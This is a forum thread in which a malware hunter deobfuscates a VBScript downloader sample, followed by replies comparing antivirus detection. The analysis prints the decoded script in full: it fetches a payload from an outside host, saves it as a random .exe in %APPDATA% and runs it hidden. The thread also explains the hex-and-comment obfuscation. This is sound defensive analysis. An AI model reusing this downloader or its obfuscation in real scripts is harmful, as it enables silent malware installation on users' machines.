Malware Analysis 1.vbs sample - downloader - VBSWGbased.gen - deobfuscation

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
1.vbs

2/53

https://www.virustotal.com/en/file/...bb68230d813bf8272f74b4409f337870a12/analysis/

exe file dropped : BehavesLike.Win32.ZeroAccess.mm
temporary random name + ".exe"
radB8945.tmp.exe

in %APPDATA%\

"C:\Users\DardiM\AppData\Roaming\"

As I often do, I will analyse the downloader script by deobfuscating it.
I chose this sample because it is fresh and not currently detected by most AV / anti-malware tools.

After I unzipped 1.vbs, when I began this post:
- Not detected by KTS, ZAM (licence)
- Detected by Crystal Security cloud engine as soon as I ran it (CS): 4 AVs
- VoodooShield detected it and reported 2 threats: blocking both files was recommended

Script used : Visual Basic Scripting

(1) Quick analysis

This script contains 34 lines of 2049 chars and 1 line of 2080 chars.
All 34 lines are only there to make it "harder" to see the real interesting part.

If you edit the file with "wrap" enabled, it looks like an incoherent "language" everywhere (or maybe an extraterrestrial language :confused: )

=> it's better to deactivate this option to analyse our sample :)

All 34 useless lines begin with ' => normally used to put a comment in code; here it puts in text to obfuscate the whole script a lot more, but as they are comments, all these lines can be deleted.

We can eliminate all the lines beginning with the char '
'2SUbQ7x9dr7ct3tzc019w5 qa0zmnyiA0p 4Izb0R12im gZm2t DKzTAZyWlJB6ZijnbHdYrcSKhUNhAKcj3aZCsMG03pqB sxkGwG djwY40Zt mJt3hFxEiLON xDYrQD1 PFXmOZITUoie5NJC REu ..............

We then keep only line 17, with the real important part

=> line 17 :

Function JXAHJSM(s): Dim g,a: For g=1 To Len(s) Step 2:a=a & Chr("&H" & Mid(s,g,2)):Next:JXAHJSM= a:End Function:Execute(JXAHJSM("4F6E204572726F72205265737 ................456E642049663A")):

The first function is not too hard to understand: it receives a string as parameter (in red above - only a small part, because there are 1948 chars), and the conversion is made 2 chars by 2 chars.

Chr("&H" & Mid(s,g,2)) => HEX to ASCII conversion

The second function executes the first one

(2) HEX to ASCII

On Error Resume Next:CreateObject("dc"):
If Err.Number>0 Then Function CEKFRDUO(POGQVLS):
set CEKFRDUO=CreateObject(POGQVLS):End
Function:Set WCQXGR=CEKFRDUO(JXAHJSM("536372697074696E672E46696C6553797374656D4F626A656374")):
Set UZWAFBHXM=CEKFRDUO(
JXAHJSM("575363726970742E5368656C6C")):
Set CXAKA=CEKFRDUO(
JXAHJSM("57696E487474702E57696E48747470526571756573742E352E31")):
Set HSKWV=CEKFRDUO(
JXAHJSM("41444F44422E53747265616D")):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open
JXAHJSM("474554"),JXAHJSM("687474703A2F2F676F706C6472746F702E746F702F6C6F672E7068703F663D312E6A7067"),0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+
JXAHJSM(".exe"):
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:
End If:
End If:

We can see in the spoiler that the main conversion function is used several times.
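An added example (not code from the original post or from the sample): a small Python deobfuscator that does statically what the two steps above do by hand, dropping the ' comment padding and decoding every JXAHJSM("...") hex argument in place. The text it runs on is constructed from fragments quoted above; the function and variable names in it are the sample's own.

```python
import re

# Constructed sample: two padding comment lines plus a fragment of the decoded
# line 17, using hex strings quoted in the analysis above (the URL hex is cut
# down to its "http://" prefix on purpose).
SAMPLE = "\n".join([
    "'2SUbQ7x9dr7ct3tzc019w5 qa0zmnyiA0p 4Izb0R12im gZm2t DKzTAZyWlJB6Zijnb",
    'Set WCQXGR=CEKFRDUO(JXAHJSM("536372697074696E672E46696C6553797374656D4F626A656374")):',
    "'xDYrQD1 PFXmOZITUoie5NJC REu mJt3hFxEiLON",
    'Set UZWAFBHXM=CEKFRDUO(JXAHJSM("575363726970742E5368656C6C")):',
    'Set CXAKA=CEKFRDUO(JXAHJSM("57696E487474702E57696E48747470526571756573742E352E31")):',
    'Set HSKWV=CEKFRDUO(JXAHJSM("41444F44422E53747265616D")):',
    'CXAKA.Open JXAHJSM("474554"),JXAHJSM("687474703A2F2F"),0:',
])


def strip_comment_lines(script: str) -> str:
    """Drop the padding: a VBScript line whose first non-blank char is ' is a comment."""
    return "\n".join(l for l in script.splitlines() if not l.lstrip().startswith("'"))


def jxahjsm(hexstr: str) -> str:
    """Python twin of the sample's JXAHJSM: Chr("&H" & Mid(s,g,2)) for every 2 hex chars."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def call_pattern(func_name: str = "JXAHJSM") -> re.Pattern:
    """Match func_name("<hex>") where the argument is nothing but hex digits."""
    return re.compile(re.escape(func_name) + r'\("([0-9A-Fa-f]+)"\)')


def decoded_strings(script: str, func_name: str = "JXAHJSM") -> list:
    """Triage view: every decoded argument, in order (COM ProgIDs, verbs, URLs)."""
    return [jxahjsm(m.group(1)) for m in call_pattern(func_name).finditer(script)]


def decode_calls(script: str, func_name: str = "JXAHJSM") -> str:
    """Replace each func_name("<hex>") with the decoded string as a VBScript literal."""
    return call_pattern(func_name).sub(lambda m: '"' + jxahjsm(m.group(1)) + '"', script)


def deobfuscate(script: str) -> str:
    """Steps (1) and (2) of the analysis: strip comment padding, then decode the hex calls."""
    return decode_calls(strip_comment_lines(script))


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(decoded_strings(SAMPLE))
```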

(3) HEX to ASCII one more time

On Error Resume Next:CreateObject("dc"):
If Err.Number>0 Then Function CEKFRDUO(POGQVLS):
set CEKFRDUO=CreateObject(POGQVLS):End
Function:Set WCQXGR=CEKFRDUO("Scripting.FileSystemObject"):
Set UZWAFBHXM=CEKFRDUO("WScript.Shell"):
Set CXAKA=CEKFRDUO("WinHttp.WinHttpRequest.5.1"):
Set HSKWV=CEKFRDUO("ADODB.Stream"):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open "GET","http://gopldrtop.top/NAME.php?f=1.jpg",0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+".exe":
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:End
If:End If:

It's now easier to understand some parts :)

Let's simplify some parts to make them completely deobfuscated

(4) Last step, with some formatting

On Error Resume Next:
CreateObject("dc"):
If Err.Number>0 Then

Function func_CreateObject(string_object):
set func_CreateObject=CreateObject(string_object):
End Function:
Set fso = CreateObject("Scripting.FileSystemObject"):
Set shell = CreateObject("WScript.Shell"):
Set obj_http = CreateObject("WinHttp.WinHttpRequest.5.1"):
Set obj_ADODBStream = CreateObject("ADODB.Stream"):
temp_Path=fso.BuildPath(shell.ExpandEnvironmentStrings("%APPDATA%"),fso.GetTempName):
On Error Resume Next:
Err.Clear:
obj_http.Open "GET","http://gopldrtop.top/NAME.php?f=1.jpg",0:
If Err=0 Then

obj_http.Send:
obj_ADODBStream.Type=1:
obj_ADODBStream.Open:
obj_ADODBStream.Write obj_http.ResponseBody:
obj_ADODBStream.Position=0:
temp_Path=temp_Path+".exe":
Set file = fso.CreateTextFile(temp_Path):
For QJCXYOBP=0 to lenb(obj_http.ResponseBody)-1:
file.Write chr(ascb(obj_ADODBStream.Read(1))):
Next:
file.Close:
shell.Run temp_Path,0:
End If:
End If:

I wrote "NAME.php" only for security; that's not the real file name

On Error Resume Next: => Specifies that when a run-time error occurs, control goes to the statement immediately following the statement where the error occurred, and execution continues from that point.

On Error Resume Next:CreateObject("dc"): => generates an error that is expected, because "dc" has no meaning for the CreateObject function :)
If Err.Number>0 Then => right: we can continue, because the first CreateObject "worked" as expected ;)

"WScript.Shell" to get the %APPDATA% folder and, at the end, to run the exe file
"Scripting.FileSystemObject" to build a path with %APPDATA% and a temp file name (GetTempName gives a random temp file name with a .tmp extension) and to create the file
"WinHttp.WinHttpRequest.5.1" the object used for the HTTP request
"ADODB.Stream" to save (in a memory stream) the content from the HTTP request (ResponseBody)

(5) Conclusion

No need for a complicated obfuscation method to do its job ...
They could have made a more complicated conversion function too ... so thanks to them :p

DardiM

Great post @DardiM :)

"- Detected by Crystal Security cloud engine : 4 AVs
- Not seen by KTS, ZAM when I began this post."

Another reason to choose Crystal Security over Zemana.;)

Thanks for the kind words :)

To make my deobfuscation analysis, I didn't run the 1.vbs file

When I said "not detected", I mean "when I extracted the zip file", and afterwards "when I made a static scan".

As soon as I unzipped the downloader script 1.vbs into a folder:

- Only Crystal Security warned me:
=> file reported as unsafe BECAUSE I made some personal settings: "suspicious file detection" set to 1% (default: 5%) and "unsafe file" set to 3% (default: 10%)
=> 3.8% => unsafe file reported (2/53)

- Crystal Security cloud-based engine is a killer :)

- VoodooShield detected the same when I dropped the 1.vbs onto the Shield => Blocking recommended (2/53)

KTS and ZAM didn't react after I unzipped it and made scans

DardiM

Kind of funny that Windows Defender detects this and not really any other AVs. :p

Thanks for the share!

KTS doesn't let you download the payload if you go directly to the website (detected as dangerous by cloud).

I think both files are too fresh to have been put in the databases, but if they are run, AVs / anti-malware tools may do their job.
I've made, as I said, an analysis of this .vbs obfuscation method; I can make a dynamic test later to see how AVs / anti-malware tools react.

DardiM

July 26 - 11:30 pm (France time): when I began my post
July 27 - 03:00 pm (France time): now

(1)
=> ZAM now detects the 1.vbs file by scan and when I try to run it :) : (Script:Generic/bundpill.A!Kaca)

When trying to run radB8945.tmp.exe :

message.jpg


(2)
=> KTS activated (ZAM and VoodooShield off)

When the script is run, the payload is downloaded to %APPDATA% without any warning message.
When it is run by the script, this message pops up:
test.jpg


When afterwards I tried to run radB8945.tmp.exe manually, the blue message popped up (see above)

Thank God, it seems the downloaded payload is corrupted :D
